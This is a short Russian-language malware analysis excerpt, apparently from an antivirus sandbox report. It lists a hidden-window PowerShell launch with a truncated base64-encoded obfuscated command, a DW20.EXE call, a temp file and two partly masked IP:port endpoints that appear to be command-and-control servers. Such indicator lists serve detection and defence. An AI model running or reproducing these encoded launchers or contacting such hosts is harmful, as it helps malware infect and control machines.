Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AEEAQwBHAG8AbwAgAD0AIAAnADYAMQA2ACcAOwAkAHcAeABEAEcAWABjAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcAcwB3ACcALAAnADQAUQAnACwAJwBaAEEAQQBBACcAKQA7ACQATwBRAEcAUQBBAEEAPQAkAGUAbgB2ADoAdQBzAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1185373.cvr
- '19#.#41.243.98':8080
- '91.##3.2.132':8000
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AEEAQwBHAG8AbwAgAD0AIAAnADYAMQA2ACcAOwAkAHcAeABEAEcAWABjAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcAcwB3ACcALAAnADQAUQAnACwAJwBaAEEAQQBBACcAKQA7ACQATwBRAEcAUQBBAEEAPQAkAGUAbgB2ADoAdQBzAG...' (со скрытым окном)